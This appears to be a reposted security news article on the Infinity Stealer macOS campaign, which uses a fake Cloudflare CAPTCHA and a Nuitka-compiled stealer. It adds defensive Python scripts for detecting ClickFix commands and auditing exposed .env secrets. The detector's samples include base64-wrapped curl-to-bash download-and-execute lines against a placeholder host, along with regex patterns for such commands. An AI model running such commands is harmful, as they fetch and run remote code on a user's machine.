Infinity Stealer Targets macOS Using ClickFix Trick and Python-Based Malware


A newly identified information-stealing malware, dubbed Infinity Stealer, is targeting macOS users through a sophisticated attack chain that blends social engineering with advanced evasion techniques. Security researchers at Malwarebytes report that this is the first known campaign combining the ClickFix technique with a Python-based payload compiled using the Nuitka compiler.

The attack begins with a deceptive prompt designed to resemble a legitimate human verification step from Cloudflare. Victims are presented with a fake CAPTCHA and instructed to paste a command into the macOS Terminal to complete the verification. This method, known as ClickFix, gets the victim to do the attacker's work: because the user runs the command in Terminal, whatever it fetches with curl never carries the quarantine attribute that Gatekeeper relies on, so the usual warnings about unsigned or unnotarized software never appear.

Once the command is executed, it decodes an encoded script embedded in the command and runs it; that script downloads and launches the next stage. The payload is compiled into a native macOS binary using Nuitka, which translates Python source into C and compiles it with a native toolchain. The result is significantly harder to detect and analyze than traditional Python-based threats built with bytecode packaging tools such as PyInstaller, whose bundled .pyc files can be extracted and decompiled almost directly.
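As an added example (not code from Malwarebytes or from the original article), the following Python script scans process command lines for the ClickFix pattern described above: a base64 blob decoded and piped into a shell, a curl or wget download piped into a shell, or an eval of decoded content. It also decodes any embedded base64 blob and scans the inner command, so a staged one-liner is flagged at both layers. The sample command lines are constructed for this example and the host example.invalid is a placeholder; the rule set is a heuristic, not a signature for this specific campaign.

```python
import base64
import binascii
import re

# Interpreters a ClickFix one-liner typically pipes its decoded stage into.
INTERPRETERS = r"(?:bash|sh|zsh|python3?|osascript|perl)\b"

# Heuristic rules; -D is the decode flag on macOS's base64, -d/--decode on GNU.
PATTERNS = {
    "base64_decode_to_shell": re.compile(
        r"base64\s+(?:-d|-D|--decode)\b.*\|\s*" + INTERPRETERS),
    "remote_fetch_to_shell": re.compile(
        r"\b(?:curl|wget)\b[^|]*\|\s*" + INTERPRETERS),
    "eval_of_decoded": re.compile(
        r"\beval\b.*base64\s+(?:-d|-D|--decode)\b"),
}

# Runs that look like base64 text; short runs are ignored to limit false positives.
BASE64_RE = re.compile(r"[A-Za-z0-9+/]{12,}={0,2}")


def decoded_blobs(cmd):
    """Yield embedded base64 strings from cmd that decode to printable text."""
    for m in BASE64_RE.finditer(cmd):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
            text = raw.decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue
        if all(ch.isprintable() or ch in "\n\t" for ch in text):
            yield text


def scan_command(cmd, depth=0, max_depth=3):
    """Return the rule names tripped by cmd, recursing into decoded base64 layers."""
    findings = [name for name, pat in PATTERNS.items() if pat.search(cmd)]
    if depth < max_depth:
        for inner in decoded_blobs(cmd):
            findings += [f"decoded[{depth + 1}]:{f}"
                         for f in scan_command(inner, depth + 1, max_depth)]
    return findings


def scan_commands(cmds):
    """Map each command line that trips at least one rule to its findings."""
    flagged = {}
    for cmd in cmds:
        findings = scan_command(cmd)
        if findings:
            flagged[cmd] = findings
    return flagged


def b64(s):
    """Helper used only to build the constructed samples below."""
    return base64.b64encode(s.encode()).decode()


# Constructed sample process command lines (not real campaign artefacts).
SAMPLE_COMMANDS = [
    f'echo "{b64("curl -fsSL http://example.invalid/stage2.sh | bash")}" | base64 -d | bash',
    "curl -fsSL http://example.invalid/verify.sh | sh",
    "ls -la ~/Documents",
    "git status",
    f'echo "Verify you are human" && eval "$(echo {b64("echo verified")} | base64 --decode)"',
]

if __name__ == "__main__":
    for cmd, findings in scan_commands(SAMPLE_COMMANDS).items():
        print(findings, "<-", cmd)
```

On a real fleet the input would be process-creation events from an EDR or from the macOS unified log rather than a hard-coded list; the useful signal is a Terminal-spawned shell whose parent is the user's interactive session and whose command line decodes to a second download-and-execute stage.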

The infection chain unfolds in multiple stages. After the initial script runs, it installs a loader that extracts the final malware payload. Before initiating its malicious activities, the malware performs checks to determine whether it is running in a virtual or sandboxed environment, helping it evade detection by security tools.

Once active, Infinity Stealer begins harvesting sensitive information from the infected system. This includes login credentials stored in Chromium-based browsers and Firefox, entries from the macOS Keychain, cryptocurrency wallet data, and plaintext secrets found in developer files such as .env configurations. It can also capture screenshots, adding another layer of data collection.
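The .env exposure described above, as an added example that is not part of the original article or of Malwarebytes' research: a small Python audit that walks a directory tree the way a stealer would, parses every .env-style file, and reports secret-looking keys that hold real (non-placeholder) values, so a developer can see what this class of malware would have collected from their machine. The key-name and placeholder heuristics, the skipped directories and the sample project tree are all constructed for this example.

```python
import os
import re
import tempfile
from pathlib import Path

# Key names that usually hold credentials (heuristic, constructed for this example).
SECRET_KEY_RE = re.compile(
    r"(SECRET|TOKEN|PASSWORD|PASSWD|PRIVATE_KEY|API_KEY|ACCESS_KEY|CREDENTIAL)", re.I)
# Values that are obviously not real secrets: empty, "changeme", ${VAR}, <placeholder>.
PLACEHOLDER_RE = re.compile(r"^(|changeme|xxx+|\$\{[^}]*\}|<[^>]*>)$", re.I)
SKIP_DIRS = {"node_modules", ".git", "venv", ".venv"}


def parse_env(text):
    """Parse KEY=value lines of a dotenv file (comments, 'export' prefix, quotes)."""
    out = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        if line.startswith("export "):
            line = line[len("export "):]
        key, _, value = line.partition("=")
        value = value.strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "'\"":
            value = value[1:-1]
        out[key.strip()] = value
    return out


def audit_env_files(root):
    """Return sorted (relative_path, key) pairs for secret-looking, non-placeholder values."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]
        for name in filenames:
            if name == ".env" or name.startswith(".env."):
                path = Path(dirpath, name)
                for key, value in parse_env(path.read_text(errors="replace")).items():
                    if SECRET_KEY_RE.search(key) and not PLACEHOLDER_RE.match(value):
                        hits.append((os.path.relpath(path, root), key))
    return sorted(hits)


def build_sample_tree():
    """Constructed fixture: a fake project directory with a few dotenv files."""
    root = Path(tempfile.mkdtemp(prefix="envaudit-"))
    (root / "app").mkdir()
    (root / "app" / ".env").write_text(
        "# local config\n"
        "DATABASE_URL=postgres://localhost/app\n"
        "STRIPE_SECRET_KEY=sk_test_example123\n"
        'export AWS_ACCESS_KEY_ID="AKIAEXAMPLEEXAMPLE"\n'
        "SMTP_PASSWORD=changeme\n")
    (root / "app" / ".env.example").write_text("STRIPE_SECRET_KEY=${STRIPE_SECRET_KEY}\n")
    (root / "node_modules").mkdir()
    (root / "node_modules" / ".env").write_text("NPM_TOKEN=should_be_skipped\n")
    return root


def demo():
    """Run the audit over the constructed tree; returns the list of exposed keys."""
    return audit_env_files(build_sample_tree())


if __name__ == "__main__":
    for rel_path, key in demo():
        print(f"{rel_path}: {key}")
```

Pointing audit_env_files at a home directory shows the same files a stealer's directory walk would find; anything it lists is readable by any process running as that user, which is exactly the position a ClickFix payload is in. Keeping real credentials out of checked-out trees (short-lived tokens, a secrets manager, or at least values injected only at run time) reduces what a single compromised session can take.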

The stolen information is then transmitted to attacker-controlled servers via HTTP requests. 

Additionally, notifications are sent through Telegram to alert threat actors when data exfiltration is complete, enabling real-time monitoring of compromised systems.

Researchers warn that this campaign highlights the growing sophistication of threats targeting macOS, a platform often perceived as more secure. The use of social engineering combined with advanced compilation techniques demonstrates how attackers are evolving their methods to bypass traditional defenses.

Users are strongly advised never to run commands in Terminal that were supplied by a web page or pop-up: no legitimate CAPTCHA or human-verification step requires this, and doing so hands the attacker the same access as the logged-in user.

This article has been indexed from CySecurity News – Latest Information Security and Hacking Incidents